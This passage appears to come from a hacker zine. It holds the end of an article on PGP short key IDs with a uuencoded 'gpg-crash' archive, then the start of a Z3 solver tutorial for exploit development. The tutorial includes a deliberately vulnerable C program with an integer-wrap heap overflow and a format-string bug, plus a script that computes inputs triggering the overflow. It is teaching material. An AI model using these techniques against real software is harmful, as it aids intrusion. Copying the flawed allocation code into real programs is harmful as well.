[1] "PGP CPU time wasta (never refer to pgp key using 32bit key-id)"
http://seclists.org/fulldisclosure/2010/May/120
[2] "Short key IDs are bad news (with OpenPGP and GNU Privacy Guard)"
http://www.asheesh.org/note/debian/short-key-ids-are-bad-news.html
[3] "OpenPGP Message Format" - Callas, et al - November 2007
https://tools.ietf.org/html/rfc4880
[4] "Cryptanalysis of RSA with Small Prime Difference" - B de Weger - 2002
http://www.enseignement.polytechnique.fr/profs/informatique/Francois.Morain
/Master1/Crypto/projects/Weger02.pdf
[5] Complementary event - Wikipedia
https://en.wikipedia.org/w/index.php?title=Complementary_event&oldid=545752
375#Example_of_the_utility_of_this_concept
[6] y = 1 - ((2 ^ 32 - 1) / 2 ^ 32) ^ (60 * 60 * 24 * 365 * a * x) with a
from 1 to (2013 - 1970) with x from 1 to 200 - Wolfram|Alpha
http://wolfr.am/YxKsTU
[7] haveged - A simple entropy daemon
http://www.issihosts.com/haveged/
[8] oclHashcat-plus - advanced password recovery | Performance section
http://hashcat.net/oclhashcat-plus/

---[ 6 - Code

begin 644 gpg-crash.tar.gz
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
8LW[6S_I9/^MG_:R?W^_Y'V5<-G8`>```
`
end


|=[ 0x05 ]=---=[ How to cheat at maths - chown ]=------------------------=|


|=-----------------------------------------------------------------------=|
|=----------------------=[ How I Cheat at Maths - Z3 101 ]---------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------------=[ by chown ]=--------------------------=|
|=-----------------------------------------------------------------------=|


--[ Introduction

Welcome reader. I am writing this small text because it has recently come
to my attention that a lot of people significantly smarter than me are
intimidated by the mention of Z3 and solvers in general, and avoid using
them. I think it is a common mentality that Z3 requires some kind of maths
degree as a prerequisite for its use, however for me it is the complete
opposite. 

Hopefully by the end of this small guide you will see that Z3 can provide a
trivial platform with which you can avoid doing most of the complex math
work which is associated with exploit development and reverse engineering.

--[ What is Z3?

Z3 is an SMT (satisfiability modulo theories) solver written by Microsoft
Research. It is cross platform, (Windows/Linux/Mac OS X) and free (MIT
License).

Internally at Microsoft it is used for program analysis and verification.

Z3 exposes either a C or Python based API, with a rich set of features. In
this paper we will only scratch the surface of the Python API. I feel this
is the simplest way to jump right in and instantly get value from Z3 with
almost no learning curve required. There is a lot of documentation on the
web if you wish to venture deeper into the functionality of Z3. 

--[ Installing Z3

Installing Z3 is a simple process, and as i mentioned, can be done on most
operating systems. The source code to Z3 is available from the Z3 Github
page (2). 

The build instructions for Mac OS X are simply as follows:

    CXX=clang++ CC=clang python scripts/mk_make.py
    cd build
    make
    sudo make install

For Ubuntu it is even simpler:

    sudo apt-get install python-z3

Once this is done, the Python module can be used by simply using "import
z3" from within Python.

--[ Introduction to Z3

To whet your appetite, we will first explore a simple maths example
unrelated to exploit development. The following small puzzle was being
passed around social media sites:

    A+B   = 240
    C+D   = 500
    D-B+C = 455
    A+C   = 215
    What answer for D?

While this can easily be solved with math, it is much easier to make Z3 do
all the work for us.

The first step in our solver is to import z3 and declare some variables for
use in the solver. The following code creates 4 Int() type variables.
A,B,C,D and initiates the solver class. 

Note: The string passed to each variable is used to label the results when 
the model is printed at the end.

    #!/usr/bin/env python

    from z3 import *

    # Declare our variables
    A = Int('A')
    B = Int('B')
    C = Int('C')
    D = Int('D')

    s = Solver()

Now that we have our variables declared, we must define some simple
constraints for the solver. Basically we need to take each line in the
above problem and convert it to an expression using our variables.

    # Add the constraints
    s.add(A + B == 240)  # A+B   = 240
    s.add(C + D == 500)  # C+D   = 500
    s.add(D-B+C == 455)  # D-B+C = 455
    s.add(A+C == 215)    # A+C   = 215

The final steps are to use the check() function to solve the problem and
print the model at the end.

    print "[+] Solving..."
    s.check()
    ttt = s.model()
    print "[MODEL---------------------------------------]"
    print ttt
    print "[--------------------------------------------]"

Running this code provides the following output:

    $ python facebook.py 
    [+] Solving...
    [MODEL---------------------------------------]
    [C = 20, B = 45, D = 480, A = 195]
    [--------------------------------------------]

As you can see, it only took a couple of minutes to code a solver for this
problem and we got the answer D=480. Congratulations, if you followed this
far you can now cheat at facebook and impress your friends!!!

I have included the sample code for this (facebook.py) in the appendix.

--[ Z3 and Exploit dev

As I'm sure you can now imagine there are a billion small math problems
like this in exploit development. Some typical examples for me are:

* Solving input values to control allocation/copy sizes.
* Root causing a fuzz crash, one constraint for each cmp instruction, then
  control register contents as needed.
* Finding input values which constrain to certain criteria.
* etc.

To make this more clear, I have written a small vulnerable program with
which we can look at the exploitation process and how Z3 can help us.

----[ Vulnerable example

The following example code has a clearly visible integer wrap
vulnerability. We can obviously utilize this to cause a heap overflow into
the chunk pointed to by sstr.

Have a quick read over the code below, and afterwards I will explain the
challenges involved in solving this problem.

     1  #include <stdio.h>
     2  #include <stdlib.h>
     3  #include <string.h>
     4  
     5  #define HEADER "-------------------------------------------[ ASCII
DIAGRAM ]----------------------------------------------------\n"
     6  #define HDRLEN strlen(HEADER)
     7  
     8  char *copyandupdate(char *dst,char *src, unsigned int size)
     9  {
    10      memcpy(dst,src,size);
    11      dst += size;
    12      return dst;
    13  }
    14  
    15  int main(int argc, char *argv[])
    16  {
    17      unsigned int width,height,i;
    18      char *sstr,*fstr;
    19  
    20      if(argc != 3) {
    21          printf("usage: %s <width> <height>\n",argv[0]);
    22          exit(-1);
    23      }
    24  
    25      width  = strtoul(argv[1],NULL,0);
    26      height = strtoul(argv[2],NULL,0);
    27  
    28  
    29      printf("[+] Using width: %u\n",width);
    30      printf("[+] Using height: %u\n",height);
    31  
    32      if(width < 5) {
    33          printf("error: Width too small\n");
    34          exit(1);
    35      }
    36  
    37      if((width * height + HDRLEN) > 0x3fffffff) {
    38          printf("error: Table too large (%u) \n",width *
height);
    39          exit(1);
    40      }
    41  
    42      printf("[+] Allocating buffer sized: %u\n", width * height
+ HDRLEN);
    43      sstr = fstr = malloc(width * height + HDRLEN);
    44      if(!fstr) {
    45          printf("error: Out of Memory!\n");
    46          exit(1);
    47      }
    48  
    49      printf("[+] Writing header to buffer (%u bytes)\n",HDRLEN);
    50      fstr = copyandupdate(fstr,HEADER,HDRLEN);
    51      for(i = 0 ; i < height ; i++ )
    52      {
    53          char *m = malloc(width);
    54          if(!m) {
    55              printf("error: Out of Memory!\n");
    56              break;
    57          }
    58          memset(m,'X',width);
    59          m[width-3] = '\r';
    60          m[width-2] = '\n';
    61          m[width-1] = '\x00';
    62          fstr = copyandupdate(fstr,m,width-1);
    63          free(m);
    64      }
    65  
    66      printf(sstr);   
    67  
    68  }
    69  

As I'm sure you saw, this code takes a width and height parameter from the
command line and creates an ascii table containing the appropriate number
of X's.

Here is some sample output from a successful run:

$ ./asciigrid 30 10
[+] Using width: 30
[+] Using height: 10
[+] Allocating buffer sized: 413
[+] Writing header to buffer (113 bytes)
-------------------------------------------[ ASCII DIAGRAM
]----------------------------------------------------
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX

The major vulnerability in this source code occurs between lines 37 and
43 in the source. As you can see below, the code takes the width and height
parameters and checks to make sure that the product of width * height plus
the length of the header is < 0x40000000. Next it allocates a buffer based
on these values. However, if width and height is large enough to create an
integer wrap, the resulting buffer allocation will not correlate to the
width and height values themselves, creating potential for a heap overflow.

    37      if((width * height + HDRLEN) > 0x3fffffff) {
    38          printf("error: Table too large (%u) \n",width *
height);
    39          exit(1);
    40      }
    41  
    42      printf("[+] Allocating buffer sized: %u\n", width * height
+ HDRLEN);
    43      sstr = fstr = malloc(width * height + HDRLEN);

Once this allocation is performed, the program begins by writing the HEADER
field into the buffer. Depending on the size of the buffer this will either
be inside or outside the allocated buffer. Due to the wrapping allocation
size calculation, there is no guarantee at this stage that a large enough
allocation was performed to house the HEADER field. 

Finally at line 51, a copy loop is performed. For each of the lines in
height an allocation of "width" bytes is performed. This is then populated
with a line of X's, and copied into the buffer. Obviously if our values are
large enough to wrap, this loop will end up writing all the way out of
bounds of our buffer, but it also has no way to stop copying, therefore it
will write all the way until it hits an unmapped page, causing program
termination.

    51          for(i = 0 ; i < height ; i++ )
    52          {
    53                  char *m = malloc(width);
    54                  if(!m) {
    55                          printf("error: Out of Memory!\n");
    56                          break;
    57                  }
    58                  memset(m,'X',width);
    59                  m[width-3] = '\r';
    60                  m[width-2] = '\n';
    61                  m[width-1] = '\x00';
    62                  fstr = copyandupdate(fstr,m,width-1);
    63                  free(m);
    64          }

Luckily for us (;)) there does exist a clean way out of this loop. If the
malloc allocation of width bytes fails, the loop is exited, and the program
continues.

This means, if we can wrap the allocation while having a large enough width
to force the allocation to fail, we are able to perform our overflow
(copying the header out of bounds) without program termination occurring.
(This gives us an opportunity to utilize our overflow). The question is,
what input values will allow all this to happen?

---[ Solving

As you can imagine, the next step in our process is to write a simple
solver to calculate these values for us. Once again the process is very
simple

We begin by importing our library:

     1  #!/usr/bin/env python
     2  
     3  from z3 import *
     4  

Next we need to declare the variables used by our sample program. The first
variables which we need are the width and height variables. In the previous
example we used Int() type variables. However, in this case, we use a
BitVec() type. The main difference between these two types in Z3 is the
ability to perform binary operations on the BitVec. Also we are able to
specify the exact size of the variable, this lets us more easily simulate
integer wraps. In this example I am targeting a 32-bit platform, therefore
I use the size 32 for each variable. We also need a variable to hold the
size of the header, this is not strictly necessary but provides a more
clear output in my opinion.

     5  width = BitVec('width', 32)
     6  height = BitVec('height', 32)
     7  headersize = BitVec('headersize',32)
     8  

Next, I create a convenience variable allocsize. This is used to hold the
result of the calculation. Instead of this variable we could simple write
width * height + headersize each time, however if we did this, the size of
the allocation would not be visible in the printed model. Since we care
about this size, it makes sense to use a convenience variable.

     9  allocsize = BitVec('allocsize',32)
    10  
    11  s = Solver()
    12  

Now that we've declared our variables and initialized the Solver the next
step is to add constraints to our model. The first constraint in this
program is simply declaring the headersize value. This is done with the
following line:

    13  s.add(headersize == 113)

The next constraint we can add, is to make sure that width by itself is
enough to cause the allocation to fail, an easy way to do this is to make
sure it is above 0xf0000000, since this would be large enough for a 32-bit
process to fail. You may notice that we used a function "UGT" for this,
rather than the > operator. The reason for this is that the > operator by
default will perform a signed comparison. UGT (unsigned greater than) will
provide us with the unsigned functionality we need. As you can imagine the
counter function to this ULT() will perform an unsigned less than
comparison. Reading the help for the module will show many other useful
functions similar to this.

    14  s.add(UGT(width,0xf0000000)) # For malloc fail

Obviously, we need a constraint to calculate allocsize. This is simply a
case of performing the same calculation directly from the source code.

    15  s.add(allocsize == width * height + headersize)

We then make sure that the allocsize is less than the headersize, so that
an overflow occurs.

    16  s.add(ULT(allocsize & 0xffffffff,headersize))
    17  

Finally, we solve and print the model...

    20  print "[+] Solving..."
    21  s.check()
    22  ttt = s.model()
    23  print "[MODEL---------------------------------------]"
    24  print ttt
    25  print "[--------------------------------------------]"

If we run this solver, the following values are generated:

    $ python solver.py 
    [+] Solving...
    [MODEL---------------------------------------]
    [height = 2318056819,
     width = 4192030789,
     allocsize = 112,
     headersize = 113]
    [--------------------------------------------]

Inputting this into the target program confirms our technique, an
allocation of 112 bytes is performed and then a header (113) bytes is
written to it. Finally an allocation fails, and the loop is exited, then
the buffer is printf'ed. (in a vulnerable way... ;) )

$ ./asciigrid 4192030789 2318056819
[+] Using width: 4192030789
[+] Using height: 2318056819
[+] Allocating buffer sized: 112
[+] Writing header to buffer (113 bytes)
asciigrid(98654,0xa33e5000) malloc: *** mach_vm_map(size=4192034816) failed
(error code=3)
*** error: can't allocate region
*** set a breakpoint in malloc_error_break to debug
error: Out of Memory!
-------------------------------------------[ ASCII DIAGRAM
]----------------------------------------------------

Finding a way to leverage this overflow is outside of the scope of this
paper, however I have personally leveraged a very similar situation in a
real life application.


---[ Adding constraints to enumerate possibilities?

In the above example, the solver gave us a situation where the buffer was
sized 1 byte smaller than the copy, however, in real life, most allocators
naturally align sizes before returning a chunk to the program. This means
that in the above example, no overflow would actually take place. Also with
the above situation, we often want to enumerate the QUANTUM sizes which we
can utilize on the heap, so we can look for overflow targets etc.

Z3 is not really designed for this, solving all permutations, and is more
designed for solving a single one. However, we can easily cheat by adding
additional constraints to the program. A simple example of this, since we
